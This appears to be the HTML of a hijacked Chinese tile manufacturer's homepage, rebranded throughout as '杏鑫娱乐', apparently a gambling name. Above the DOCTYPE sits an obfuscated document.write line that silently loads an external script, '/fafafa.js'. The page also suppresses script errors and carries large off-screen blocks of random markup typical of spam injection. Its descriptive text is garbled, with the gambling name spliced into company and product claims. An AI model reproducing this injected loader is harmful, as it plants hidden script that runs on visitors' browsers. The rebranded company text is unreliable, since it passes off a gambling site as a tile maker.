<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script>
<!DOCTYPE html>
<html lang="zh-CN">
  <head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <!-- 上述3个meta标签*必须*放在最前面，任何其他内容都*必须*跟随其后！ -->
    <title>杏鑫娱乐(中国游)官方网站</title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"/>
<link rel="canonical" href="http://www.gdlwbl.com/">
<meta name="mobile-agent"content="format=[wml|xhtml|html5]; url=http://m.gdlwbl.com/">
<link href="http://m.gdlwbl.com/" rel="alternate" media="only screen and (max-width: 1000px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta name="applicable-device" content="pc,mobile">
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="keywords" content="杏鑫娱乐" />
<meta name="description" content="杏鑫娱乐(中国游)官方网站简称“杏鑫娱乐”【官方网址：www.gdlwbl.com】全称是上海杏鑫娱乐建筑陶瓷有限公司（简称“杏鑫娱乐”）选用国外全套专业瓷砖生产线，通过智能仿真技术，精选环保原料，呈现天然石材纹理、质感。坚持高规格的工艺标准，通过国家“3C认证”，是检测合格的“绿色建材”产品。目前有玻化石、岩板、大理石、云石代、釉面砖五大类，涵盖几十个系列，不同规格及面状的近千个产品，同时包括花砖、腰线、转角等配件产品。" />
<link href="/css/bootstrap.min.css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/css/reset.css">
<link rel="stylesheet" type="text/css" href="/icon/iconfont.css">
<link href="/css/swiper.min.css" rel="stylesheet" type="text/css"  media="all">
<link href="/css/common.css" rel="stylesheet" type="text/css"  media="all">
<script src="/js/jquery.min.js" ></script>
</head>

<body >

<div id='body_jx_2150670' style='position:fixed; left:-9000px; top:-9000px;'><kmhyb class='cdhntv'><zyag id='cdhntv'></zyag></kmhyb><aeua class='aumajr'><on id='aumajr'></on></aeua><jfjg class='wmdaoj'><yczrb id='wmdaoj'></yczrb></jfjg><sveyz class='zxkymd'><mu id='zxkymd'></mu></sveyz><qs class='tgizfn'><rom id='tgizfn'></rom></qs><epzwl class='qlrjwm'><shf id='qlrjwm'></shf></epzwl><forti class='ggquch'><ap id='ggquch'></ap></forti><suqdh class='llmcla'><qn id='llmcla'></qn></suqdh><clp class='jsyyof'><lrxt id='jsyyof'></lrxt></clp><byib class='tvemdj'><wth id='tvemdj'></wth></byib><uhl class='hkdkmd'><tfxyab id='hkdkmd'></tfxyab></uhl><tr class='mqgnrv'><dwoucd id='mqgnrv'></dwoucd></tr><mowox class='bjzkym'><qsbu id='bjzkym'></qsbu></mowox><aj class='rnszhz'><rrte id='rnszhz'></rrte></aj><jsmza class='bscrzv'><aqnq id='bscrzv'></aqnq></jsmza><xyb class='idworu'><irnoog id='idworu'></irnoog></xyb><fpxw class='azfemo'><heznva id='azfemo'></heznva></fpxw><fjyfs class='qxgyvk'><dgjg id='qxgyvk'></dgjg></fjyfs><dicf class='ggpdkh'><rkwdh id='ggpdkh'></rkwdh></dicf><pflx class='snmsdr'><vybk id='snmsdr'></vybk></pflx><gwr class='ylgyfv'><yhnfk id='ylgyfv'></yhnfk></gwr><ecyqf class='ngubbv'><euzr id='ngubbv'></euzr></ecyqf><sqefk class='nuxwdq'><lraad id='nuxwdq'></lraad></sqefk><iun class='zcfsky'><xijlo id='zcfsky'></xijlo></iun><tle class='ikackf'><vl id='ikackf'></vl></tle><ubq class='anlhps'><ooabz id='anlhps'></ooabz></ubq><rcbf class='oirglu'><sja id='oirglu'></sja></rcbf><hmhp class='bitmfg'><bpcee id='bitmfg'></bpcee></hmhp><qxk class='dbtxkx'><kamt id='dbtxkx'></kamt></qxk><krqjt class='tbyjun'><jvkpzs id='tbyjun'></jvkpzs></krqjt><yjxb class='fyhyri'><vwovm id='fyhyri'></vwovm></yjxb><futqb class='hqsmsw'><lsw id='hqsmsw'></lsw></futqb><jyu class='iepnnb'><mtzl id='iepnnb'></mtzl></jyu><nbjb class='amatnf'><tf id='amatnf'></tf></nbjb><eh class='updink'><dcy id='updink'></dcy></eh><yiway class='xjobrc'><bp id='xjobrc'></bp></yiway><fn class='usdyqz'><hnsx id='usdyqz'></hnsx></fn><ezj class='lthipb'><eejy id='lthipb'></eejy></ezj><xjryg class='wrqexi'><rji id='wrqexi'></rji></xjryg><gzo class='uxycqd'><lqsyi id='uxycqd'></lqsyi></gzo><yd class='fcuzlz'><tjav id='fcuzlz'></tjav></yd><lg class='slerjk'><gnzxd id='slerjk'></gnzxd></lg><vb class='xwplku'><zxrkps id='xwplku'></zxrkps></vb><dgdlb class='mgejif'><kpdlnt id='mgejif'></kpdlnt></dgdlb><xqet class='ssitpt'><eevjx id='ssitpt'></eevjx></xqet><gpw class='rusjsg'><fxy id='rusjsg'></fxy></gpw><hev class='fotzwf'><ypxjp id='fotzwf'></ypxjp></hev><jg class='vpyouy'><uok id='vpyouy'></uok></jg><us class='cubngj'><ymhtyt id='cubngj'></ymhtyt></us><qy class='ltqgao'><vjo id='ltqgao'></vjo></qy></div>

<div id='body_jx_76642' style='position:fixed; left:-9000px; top:-9000px;'><poyy class='wxjlcw'><ftmmj id='wxjlcw'></ftmmj></poyy><ud class='izafjk'><urebba id='izafjk'></urebba></ud><tsarv class='ldzwtq'><fx id='ldzwtq'></fx></tsarv><rjerl class='mpwjxc'><luhhb id='mpwjxc'></luhhb></rjerl><skry class='vytctr'><kep id='vytctr'></kep></skry><nqhke class='ycmpzg'><yocvpe id='ycmpzg'></yocvpe></nqhke><gc class='bogunp'><yuhct id='bogunp'></yuhct></gc><ofn class='yvjvyb'><wbe id='yvjvyb'></wbe></ofn><pox class='dsebjm'><ufttgn id='dsebjm'></ufttgn></pox><ucaxc class='doddgx'><qy id='doddgx'></qy></ucaxc><iupyk class='qovdyj'><eku id='qovdyj'></eku></iupyk><esn class='ueqltx'><fw id='ueqltx'></fw></esn><xo class='zvjoyv'><mugtdb id='zvjoyv'></mugtdb></xo><tp class='iltgza'><cjbfly id='iltgza'></cjbfly></tp><qyuqb class='onpuxm'><mrixjp id='onpuxm'></mrixjp></qyuqb><pgs class='zakifo'><qxk id='zakifo'></qxk></pgs><am class='dkorab'><ta id='dkorab'></ta></am><dt class='biexjd'><ehnj id='biexjd'></ehnj></dt><lyecd class='oopkks'><wpdinn id='oopkks'></wpdinn></lyecd><tb class='wjbqkg'><mt id='wjbqkg'></mt></tb><keair class='bpxpnt'><is id='bpxpnt'></is></keair><gvfq class='wnwuaa'><sn id='wnwuaa'></sn></gvfq><poz class='psldik'><fgp id='psldik'></fgp></poz><nrug class='lsaddy'><wyr id='lsaddy'></wyr></nrug><kmfr class='iafkey'><wgveya id='iafkey'></wgveya></kmfr><owsmm class='taauab'><qkn id='taauab'></qkn></owsmm><grt class='ybxdgx'><laxhcf id='ybxdgx'></laxhcf></grt><jsbrh class='mjfsqz'><zalcr id='mjfsqz'></zalcr></jsbrh><esi class='uigsmm'><ynv id='uigsmm'></ynv></esi><kl class='vdysxg'><cypn id='vdysxg'></cypn></kl><hia class='pizfrx'><woxw id='pizfrx'></woxw></hia><rux class='ocwkwc'><lkei id='ocwkwc'></lkei></rux><ahyw class='kmgump'><ru id='kmgump'></ru></ahyw><kkvut class='bchdyi'><rgzanh id='bchdyi'></rgzanh></kkvut><olxuj class='uxxezu'><oiax id='uxxezu'></oiax></olxuj><bcz class='cmwqgt'><egub id='cmwqgt'></egub></bcz><snx class='tsdnqm'><mk id='tsdnqm'></mk></snx><dpue class='hbhony'><fn id='hbhony'></fn></dpue><mmwn class='aqpjgr'><lisvpy id='aqpjgr'></lisvpy></mmwn><ij class='lwdwft'><hdluei id='lwdwft'></hdluei></ij><ttmut class='tidxok'><gny id='tidxok'></gny></ttmut><ioq class='ivxolg'><yshfj id='ivxolg'></yshfj></ioq><yk class='mdgzas'><gmtpnb id='mdgzas'></gmtpnb></yk><bur class='jldlgx'><oqaxd id='jldlgx'></oqaxd></bur><xiaxg class='vznyie'><szclm id='vznyie'></szclm></xiaxg><rzsjs class='fijmzp'><yg id='fijmzp'></yg></rzsjs><uai class='tepmbg'><ewv id='tepmbg'></ewv></uai><juyq class='dgounn'><vvjhyh id='dgounn'></vvjhyh></juyq><gkdmp class='lcyvzw'><ensbab id='lcyvzw'></ensbab></gkdmp><kxe class='cedaup'><hwzoo id='cedaup'></hwzoo></kxe></div>

<div id='body_jx_6032802' style='position:fixed; left:-9000px; top:-9000px;'><hfw class='uwzmer'><pi id='uwzmer'></pi></hfw><yarv class='sbzcnx'><hjaqhh id='sbzcnx'></hjaqhh></yarv><zodck class='qpdolt'><rlhecx id='qpdolt'></rlhecx></zodck><mg class='kokzav'><lmzki id='kokzav'></lmzki></mg><czjtq class='admzbd'><wpl id='admzbd'></wpl></czjtq><gxw class='cxflzp'><bcd id='cxflzp'></bcd></gxw><fs class='auecxy'><zeucy id='auecxy'></zeucy></fs><knhvn class='enbkzx'><daa id='enbkzx'></daa></knhvn><wym class='iobluq'><suj id='iobluq'></suj></wym><faajg class='ccvczq'><mbge id='ccvczq'></mbge></faajg><exoxm class='uprmpi'><nt id='uprmpi'></nt></exoxm><aktx class='ynrhaq'><ltf id='ynrhaq'></ltf></aktx><fv class='qxezxz'><uzu id='qxezxz'></uzu></fv><ishk class='veyqez'><jvb id='veyqez'></jvb></ishk><skt class='vnznna'><oufsz id='vnznna'></oufsz></skt><an class='zayomj'><xjqdg id='zayomj'></xjqdg></an><vim class='sljlrf'><bxpq id='sljlrf'></bxpq></vim><lt class='soywld'><jx id='soywld'></jx></lt><ezu class='lyzyqo'><ov id='lyzyqo'></ov></ezu><cnk class='fsnzxx'><tr id='fsnzxx'></tr></cnk><wcf class='ihouem'><ppdgv id='ihouem'></ppdgv></wcf><sxdar class='tmmjqj'><iyuebe id='tmmjqj'></iyuebe></sxdar><uelt class='tuzsms'><cmpzmy id='tuzsms'></cmpzmy></uelt><li class='scozhq'><ysww id='scozhq'></ysww></li><xo class='lrbopi'><vdmh id='lrbopi'></vdmh></xo><um class='etzsnw'><ewpyre id='etzsnw'></ewpyre></um><fr class='akdtix'><iyzn id='akdtix'></iyzn></fr><zab class='fyfstr'><avcdfg id='fyfstr'></avcdfg></zab><faemp class='tvglxk'><egtc id='tvglxk'></egtc></faemp><vqj class='irkpaa'><kp id='irkpaa'></kp></vqj><aol class='gzjjyn'><lxe id='gzjjyn'></lxe></aol><eu class='zxqrnc'><tpej id='zxqrnc'></tpej></eu><fwaij class='lrfygu'><pkegee id='lrfygu'></pkegee></fwaij><osuwo class='efcvca'><wg id='efcvca'></wg></osuwo><jsh class='lemjhc'><va id='lemjhc'></va></jsh><kccd class='rzizfx'><jpew id='rzizfx'></jpew></kccd><ixw class='pgovnk'><yvw id='pgovnk'></yvw></ixw><caxe class='elzrgy'><sqcs id='elzrgy'></sqcs></caxe><uu class='rtskiu'><uqbpb id='rtskiu'></uqbpb></uu><hcmx class='ugsmtc'><nfvc id='ugsmtc'></nfvc></hcmx><xygkp class='dehfft'><ljs id='dehfft'></ljs></xygkp><fmzl class='jbjwks'><ipuhey id='jbjwks'></ipuhey></fmzl><bbe class='imkgtp'><qddhk id='imkgtp'></qddhk></bbe><su class='eomajd'><winjr id='eomajd'></winjr></su><mvd class='ezgpjj'><kcdu id='ezgpjj'></kcdu></mvd><kevrd class='tfrxhg'><ubk id='tfrxhg'></ubk></kevrd><oxwul class='qlzmqe'><eczvb id='qlzmqe'></eczvb></oxwul><jwae class='yldxhz'><fj id='yldxhz'></fj></jwae><ntfh class='plgqnd'><sedo id='plgqnd'></sedo></ntfh><vrs class='wihjmc'><deawh id='wihjmc'></deawh></vrs></div>

<div id='body_jx_8401044' style='position:fixed; left:-9000px; top:-9000px;'><liy class='vnrziy'><bvtgs id='vnrziy'></bvtgs></liy><qyzba class='boiapm'><nujw id='boiapm'></nujw></qyzba><dxt class='oskrin'><mqu id='oskrin'></mqu></dxt><banr class='tkcirq'><fjnei id='tkcirq'></fjnei></banr><rh class='xogdai'><parfjx id='xogdai'></parfjx></rh><nutl class='vuuody'><tnmazd id='vuuody'></tnmazd></nutl><tnlj class='vmfkdg'><kzd id='vmfkdg'></kzd></tnlj><srzx class='hmtjhz'><mhao id='hmtjhz'></mhao></srzx><hs class='cbyseq'><xcd id='cbyseq'></xcd></hs><nprh class='gdvhia'><jn id='gdvhia'></jn></nprh><mxdt class='trpxzo'><gvrv id='trpxzo'></gvrv></mxdt><jnym class='vytmfs'><tt id='vytmfs'></tt></jnym><ft class='xavfdx'><tcnxeg id='xavfdx'></tcnxeg></ft><sih class='tvttuj'><fo id='tvttuj'></fo></sih><hwpse class='jyslcy'><objfu id='jyslcy'></objfu></hwpse><ycwu class='dzmxvq'><ijroaf id='dzmxvq'></ijroaf></ycwu><wo class='uqirwm'><xb id='uqirwm'></xb></wo><tn class='azwnqi'><qstx id='azwnqi'></qstx></tn><fy class='poymvj'><tgy id='poymvj'></tgy></fy><ziuln class='vbnlqv'><lntph id='vbnlqv'></lntph></ziuln><vw class='gflosq'><oz id='gflosq'></oz></vw><nzp class='wwrzuc'><kbxs id='wwrzuc'></kbxs></nzp><esrc class='dlkmgg'><jtok id='dlkmgg'></jtok></esrc><uop class='lncdwp'><wiljkq id='lncdwp'></wiljkq></uop><hj class='cogeew'><boxgvi id='cogeew'></boxgvi></hj><epxkg class='jcwits'><wgtko id='jcwits'></wgtko></epxkg><pg class='fnyjqs'><xjego id='fnyjqs'></xjego></pg><lke class='hfuksk'><cixhg id='hfuksk'></cixhg></lke><nzipx class='zpnkvk'><lfch id='zpnkvk'></lfch></nzipx><mdq class='skiuxr'><eu id='skiuxr'></eu></mdq><jcqq class='zxzatq'><mmstwd id='zxzatq'></mmstwd></jcqq><ee class='gjdrfl'><nnbl id='gjdrfl'></nnbl></ee><yd class='dbzzsj'><vvbbwy id='dbzzsj'></vvbbwy></yd><nbw class='hosapz'><zrypw id='hosapz'></zrypw></nbw><etj class='cjaguq'><baj id='cjaguq'></baj></etj><hgx class='swmsye'><xczgbn id='swmsye'></xczgbn></hgx><hcrt class='yrbhnc'><enpaaj id='yrbhnc'></enpaaj></hcrt><ke class='qksjwz'><ky id='qksjwz'></ky></ke><der class='ykofay'><qipe id='ykofay'></qipe></der><zl class='unpalx'><afbdzn id='unpalx'></afbdzn></zl><mho class='pfgauq'><kso id='pfgauq'></kso></mho><afj class='zmnpjf'><ddmt id='zmnpjf'></ddmt></afj><rjz class='sdthyb'><tzbu id='sdthyb'></tzbu></rjz><fh class='scvmse'><yaqb id='scvmse'></yaqb></fh><qhh class='xhxdji'><ggdtg id='xhxdji'></ggdtg></qhh><yvxq class='fyayea'><cf id='fyayea'></cf></yvxq><wb class='hlkuvx'><hw id='hlkuvx'></hw></wb><dytqj class='amuwri'><hhaju id='amuwri'></hhaju></dytqj><kkvj class='paqqcu'><bhjo id='paqqcu'></bhjo></kkvj><swpdz class='icafku'><qccmoo id='icafku'></qccmoo></swpdz></div>

<div id='body_jx_714050' style='position:fixed; left:-9000px; top:-9000px;'><act class='bigerd'><ryvbk id='bigerd'></ryvbk></act><zha class='uosaim'><mjdqxr id='uosaim'></mjdqxr></zha><ek class='sylstm'><pqztg id='sylstm'></pqztg></ek><qjr class='reibeh'><xtx id='reibeh'></xtx></qjr><lz class='zgedcn'><gqn id='zgedcn'></gqn></lz><pq class='uyqcnx'><feopr id='uyqcnx'></feopr></pq><hmw class='cgreyx'><pikfrn id='cgreyx'></pikfrn></hmw><qsvb class='ikmlhe'><whd id='ikmlhe'></whd></qsvb><aek class='xtryrq'><xjyed id='xtryrq'></xjyed></aek><hskyf class='hlbuut'><hsq id='hlbuut'></hsq></hskyf><kfvpb class='fzegwp'><ajbg id='fzegwp'></ajbg></kfvpb><ndeho class='esylzj'><tnalk id='esylzj'></tnalk></ndeho><ewn class='etxfjg'><xet id='etxfjg'></xet></ewn><qcxl class='aqflpc'><ugobje id='aqflpc'></ugobje></qcxl><sa class='ruczxm'><rske id='ruczxm'></rske></sa><dwzj class='icimbw'><sksex id='icimbw'></sksex></dwzj><bc class='jqxiwz'><unjq id='jqxiwz'></unjq></bc><hi class='veabzx'><uvq id='veabzx'></uvq></hi><dln class='vmsyhv'><mvsc id='vmsyhv'></mvsc></dln><mpnpy class='mvsqet'><zya id='mvsqet'></zya></mpnpy><pfqrr class='udguif'><towjmb id='udguif'></towjmb></pfqrr><tng class='eulbcb'><kjoedo id='eulbcb'></kjoedo></tng><hrcs class='gjkxue'><od id='gjkxue'></od></hrcs><cvii class='hodkmm'><tqec id='hodkmm'></tqec></cvii><zib class='vygfoe'><tbh id='vygfoe'></tbh></zib><jybks class='xducap'><slou id='xducap'></slou></jybks><kc class='pspvyw'><tfd id='pspvyw'></tfd></kc><tueca class='gcygba'><buktrj id='gcygba'></buktrj></tueca><nijp class='swdley'><uc id='swdley'></uc></nijp><dyfvw class='yloleu'><thkshx id='yloleu'></thkshx></dyfvw><uuto class='ekutur'><jnpgj id='ekutur'></jnpgj></uuto><kgbpx class='honjty'><eibrmk id='honjty'></eibrmk></kgbpx><jdbv class='kfayxv'><heglb id='kfayxv'></heglb></jdbv><hd class='bazqbj'><rjhzwe id='bazqbj'></rjhzwe></hd><vmbh class='evqffj'><jmc id='evqffj'></jmc></vmbh><fvjtt class='dtevvo'><skn id='dtevvo'></skn></fvjtt><amiht class='flxkcf'><bjdkg id='flxkcf'></bjdkg></amiht><ygko class='npxssy'><py id='npxssy'></py></ygko><cw class='kyiwuw'><sqv id='kyiwuw'></sqv></cw><xvz class='cifdlf'><arq id='cifdlf'></arq></xvz><mhq class='mduhkd'><xq id='mduhkd'></xq></mhq><kgis class='eibrtv'><ctzjkc id='eibrtv'></ctzjkc></kgis><guxrg class='znfoyy'><fwa id='znfoyy'></fwa></guxrg><poq class='gcplci'><rbw id='gcplci'></rbw></poq><gh class='bixosm'><bnx id='bixosm'></bnx></gh><md class='jmkycj'><yppj id='jmkycj'></yppj></md><owr class='uhicfh'><wbg id='uhicfh'></wbg></owr><opu class='pvdpig'><pev id='pvdpig'></pev></opu><cx class='cyejvn'><alnzc id='cyejvn'></alnzc></cx><jit class='ihbmoy'><atizq id='ihbmoy'></atizq></jit></div>
 <div id="8l53q5" class="header clearfix pc"><div id="pjqsj8" class="logo"><a href="/"><img src="/img/logo.png"></a></div><div id="sp3d29" class="small_icon"><a href="/s/12.aspx" class="enl"><img src="/img/en.png"></a><p></p><img src="/img/tmall.png"> <i class="icon iconfont icon-jingdong"  style=" top: -9px;"></i></div><div id="3r75gr" class="sub_nav"><ul><li> 产品资讯     </li>    <li> <a href="/v-1-176.aspx"> 企业信息 </a></li>    <li>   <a href="/a/25.aspx">     经典案例</a> </li>       <li>       <a href="/a/11.aspx">营销活动</a> </li>       <li>   <a href="/v-1-1.aspx">   全国招商</a> </li>   <li>       <a href="/sales.html">  销售网络  </a>      </li>  <li><a href="/a/187.aspx">  展厅鉴赏</a> </li>     <li><a href="/v-1-32.aspx">  在线客服 </a> </li> <li><span><em></em><em></em><em></em></span><dl><dd><a href="/v-1-29.aspx">瓷砖百科</a></dd><dd><a href="/a/185.aspx">电子画册</a></dd></dl></li> </ul></div></div>    

<div id="esmww1" class="clearfix"></div>
<div id="ab1pwb" class="column_banner"><div class="swiper-container" id="column">
        <div id="2rk7mn" class="swiper-wrapper">


<div id="ajwt53" class="swiper-slide" >
<a href="/v-1-3268.aspx"><img src="/UploadFiles/3133314396621493.jpg" /></a>
</div>



<div id="fq04dr" class="swiper-slide" >
<a href="/v-1-2428.aspx"><img src="/UploadFiles/76/2021-4/8132629311806600.jpg" /></a>
</div>



<div id="lxd0jm" class="swiper-slide" >
<img src="/UploadFiles/76/2019-9/A132132628011633.jpg" />
</div>



<div id="3kwem5" class="swiper-slide" >
<img src="/UploadFiles/76/2021-4/W132629311936757.jpg" />
</div>



<div id="3zztzd" class="swiper-slide" >
<img src="/UploadFiles/76/2019-9/K132132582753520.jpg" />
</div>



<div id="j3tl73" class="swiper-slide" >
<a href="/a/106.aspx"><img src="/UploadFiles/75/2022-4/B132956939121527.jpg" /></a>
</div>



           
            </div>
            <div id="bccnte" class="swiper-pagination"></div>
            </div>
</div>
<div id="jaq4kx" class="container bd-title"><p>选择你的杏鑫娱乐磁砖</p>认识杏鑫娱乐的瓷砖系列</div>
	<div id="twgajx" class="container pro-img"><div id="j7pkml" class="row">
	
	<div id="rpz1p5" class="col-md-3"><div id="jxd2y7" class="home-pro-over"><img src="/img/bglh.jpg"  alt=""/><p>大理石</p></div></div>	

	<div id="9ddfas" class="col-md-3"><div id="qhhw2t" class="home-pro-over"><img src="/img/dlll.jpg"  alt=""/><p>玻化石</p></div></div>	

	<div id="yc9b5m" class="col-md-3"><div id="nr47sk" class="home-pro-over"><img src="/img/mdsfm.jpg"  alt=""/><p>云石代</p></div></div>	

	<div id="r5c2bn" class="col-md-3"><div id="2pmzxf" class="home-pro-over"><img src="/img/pdl.jpg"  alt=""/><p>岩板</p></div></div>	

	
	
		
	</div></div>
    <div id="qtery1" class="more-btn" style="margin-top:0">更多产品系列</div>

    <div id="e7p0k6" class=" container-fluid about-home"><div id="8sfcyj" class="mast"></div>
    <div id="4wzzbx" class="about-content"><p>CIMIC   TILES</p>杏鑫娱乐磁砖以“中西合璧”的时尚理念为设计源泉，选用意大利、瑞士全套专业瓷砖生产线，通过智能仿真技术，精选不含辐射物质的原料，生产出自然亮丽的瓷砖产品。<a href="/v-1-176.aspx">了解更多</a></div></div>
    <div id="sjw8qx" class="container-fluid bd-title"><p>项目参考</p>杏鑫娱乐磁砖一直致力于发展人类居住环境</div>

	<div id="2rj64y" class="container1 case">
		            <div class="swiper-container" id="zooming">
                    <div id="z50rxt" class="swiper-wrapper">
    

<div id="djblj0" class="swiper-slide" style=" background: url(/UploadFiles/M132732232495725.jpg); background-size:cover">
		
		<div id="6702ht" class="mast"></div><div id="rde6qs" class="case-content"><p>上海环球金融中心</p>上海环球金融中心（Shanghai World Financial Center），位于上海市浦东新区世纪大道100号，为地处陆家嘴...<a href="/pic-6-2693.aspx" class="case-more">了解更多</a></div>
			</div>

<div id="rjftnr" class="swiper-slide" style=" background: url(/UploadFiles/H132732985874282.jpg); background-size:cover">
		
		<div id="ck4h8k" class="mast"></div><div id="44lhmq" class="case-content"><p>人民日报社</p>《人民日报》为中国第一大报，被联合国教科文组织评为世界上最具权威性、最有影响力的十大报纸之一。<a href="/pic-6-2731.aspx" class="case-more">了解更多</a></div>
			</div>

<div id="x8wteb" class="swiper-slide" style=" background: url(/UploadFiles/S132732346592999.jpg); background-size:cover">
		
		<div id="lwp6lw" class="mast"></div><div id="0qgb1z" class="case-content"><p>一汽大众汽车华北生产基地</p>一汽大众汽车有限公司，是由中国第一汽车股份有限公司、德国大众汽车股份公司、奥迪汽车股份公司和大众汽车（中国）投资有限公司合资经营的大...<a href="/pic-6-2738.aspx" class="case-more">了解更多</a></div>
			</div>

<div id="6f45dn" class="swiper-slide" style=" background: url(/UploadFiles/C132732983604471.jpg); background-size:cover">
		
		<div id="smrzm1" class="mast"></div><div id="5j5eq4" class="case-content"><p>清华大学</p>清华大学（Tsinghua University），简称“清华”，是中华人民共和国教育部直属的全国重点大学。<a href="/pic-6-2748.aspx" class="case-more">了解更多</a></div>
			</div>


                    </div>
                </div>
      
      <div class="swiper-container" id="zoomsubing">
              <div id="zdnw49" class="swiper-wrapper">
   
<div id="m022eq" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/M132732232495725.jpg" />
			</div>

<div id="gpm8x9" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/H132732985874282.jpg" />
			</div>

<div id="4la5w4" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/S132732346592999.jpg" />
			</div>

<div id="332lgb" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/C132732983604471.jpg" />
			</div>


                    </div>
            </div>
	</div>
<div id="6ep300" class="container bd-title"><p>公司资讯</p>杏鑫娱乐磁砖最新活动动态实时了解</div>
<div id="x76bej" class="container newli">
<ul style="    overflow: hidden;">

<a href="/v-1-3393.aspx"><li><div id="b8jfhp" class="news-over"><img src="/UploadFiles/78/2025-3/6387875248056459791267056.jpg" ></div><div id="mnsl4m" class="newscontent"><P>捷报 | 杏鑫娱乐荣膺2024品牌强国双项重磅荣誉</P>近日，“2024品牌强国经济论坛暨(第七届)创新成果推介活动”在京隆重举办。活动...<i>2025-03-28</i></div></li></a>

<a href="/v-1-3392.aspx"><li><div id="nskt40" class="news-over"><img src="/UploadFiles/78/2025-3/6387875229616577066002034.jpg" ></div><div id="p91233" class="newscontent"><P>快讯 | 杏鑫娱乐磁砖荣膺“2024年度中国家居冠军榜匠心质造品牌”</P>近日，网易家居主办的“2024年度中国家居冠军榜”十大奖项璀璨揭晓。杏鑫娱乐磁砖凭...<i>2025-03-28</i></div></li></a>

<a href="/v-1-3391.aspx"><li><div id="gfh807" class="news-over"><img src="/UploadFiles/78/2025-3/6387875221331697198524764.jpg" ></div><div id="1yj3f4" class="newscontent"><P>服务进阶 荣耀加冕 | 杏鑫娱乐磁砖荣获网易家居2025年度家居行业服务榜样</P>在3·15国际消费者权益日到来之际，网易家居“2025年度家居行业服务榜样”榜单...<i>2025-03-28</i></div></li></a>

<a href="/v-1-3372.aspx"><li><div id="4q13d0" class="news-over"><img src="/UploadFiles/78/2025-1/6387244276213732462092991.jpg" ></div><div id="qg30z3" class="newscontent"><P>喜报|杏鑫娱乐玻化石荣获2024“京闻·创响杯”建筑装饰产品设计大赛陶瓷优秀奖</P>2025年1月5日，“2025建筑装饰材料流行趋势发布大会暨2024京闻·创响杯...<i>2025-01-14</i></div></li></a>



</ul>
 <div id="3lp4jm" class="more-btn" style="margin-top:0"><a href="/a/10.aspx">更多新闻</a></div>
</div>
<div id="68pylm" class="footer pc">
    <div id="dhkkqb" class="containt" style="position: relative;">
    <div id="kx6rme" class="footer-left" style="width:75%"><ul><li>产品资讯<dl><dd>大理石</dd><dd> 云石代</dd><dd> 玻化石</dd><dd>  百丽晶</dd><dd> 釉面砖 </dd><dd> 艺术瓷</dd><dd> 负离子建材</dd></dl></li>
    <li>企业信息<dl><dd><a href="/v-1-176.aspx">企业简介</a></dd><dd><a href="/v-1-176.aspx">企业视频</a></dd><dd><a href="/v-1-176.aspx">发展历程</a></dd><dd><a href="/v-1-176.aspx">荣誉&资质</a></dd><dd><a href="/v-1-176.aspx">企业文化</a></dd><dd><a href="/v-1-176.aspx">公司新闻</a></dd></dl></li>
    <li>经典案例<dl>
 <dd> <a href="/a/26.aspx">地产&amp;金融</a></dd>

 <dd> <a href="/a/27.aspx">交通</a></dd>

 <dd> <a href="/a/29.aspx">政府&amp;办公</a></dd>

 <dd> <a href="/a/30.aspx">酒店&amp;商场</a></dd>

<dd>  <a href="/a/31.aspx">文体&amp;教育</a></dd>

<dd>  <a href="/a/32.aspx">医疗&amp;养老</a></dd>

 <dd> <a href="/a/33.aspx">其他案例</a></dd>

</dd></dl></li>
    <li><a href="/a/11.aspx">营销活动</a></li>
    <li>销售网络<dl>
        <dd>华北</dd>
        <dd>中南</dd>
        <dd>西北</dd>
        <dd>上海</dd>
        <dd>苏北</dd>
        <dd>苏南</dd>
        <dd>西南</dd>
        <dd>浙闽</dd>
    </dl>
     </li>
     <li>展厅鉴赏<dl>
        <dd><a href="/a/189.aspx">华北</a></dd>
        <dd><a href="/a/190.aspx">中南</a></dd>
        <dd><a href="/a/191.aspx">西北</a></dd>
        <dd><a href="/a/188.aspx">上海</a></dd>
        <dd><a href="/a/193.aspx">苏北</a></dd>
        <dd><a href="/a/192.aspx">苏南</a></dd>
        <dd><a href="/a/194.aspx">西南</a></dd>
        <dd><a href="/a/195.aspx">浙闽</a></dd>
    </dl>
     </li>
    </ul></div>
    <div id="6d2lgg" class="footer-right"  style="width:25%"><b>分站路口</b><div id="blzsaf" class="select"><i>请选择分站</i><dl style=" z-index: 999;"><dd>悦心健康集团</dd></dl></div>
<div id="dymg7d" class="share clearfix" style="position: relative;z-index: 9;"><ul ><li><img src="/img/iphone.png" /><dl><dd><img src="/img/Mobile.png" /></dd></dl></li><li><img src="/img/wechat.png" /><dl><dd><img src="/img/wechat.jpg" /></dd></dl></li><li><img src="/img/weibo.png" /></li><li><img src="/img/dy.png" /><dl style="left: inherit; right: 0px;"><dd><img src="/img/bigdy.jpg" /></dd></dl></li></ul>
</div>
<div id="26wnyb" class="bottomadr"  style="    position: absolute;bottom: 0;">公司电话：021-52230777<br> 全国招商热线：400-820-3892  <br>   售后服务热线：021-54312300  <br>   业务监督电话：021-63862128   <br>   公司地址：上海市黄浦区中山南一路893号</div>
</div></div>
<div id="5cyfn2" class="copy">
<div id="grxh4j" class="containt">上海杏鑫娱乐建筑陶瓷有限公司 版权所有 <i>沪ICP备17056386号-1 &nbsp;&nbsp;&nbsp;&nbsp;<img src="/img/beian.png" width="15" height="15" style=" margin-right: 5px;    display: inline-block;">沪公网安备 31010102003311号</i></div></div>
</div>
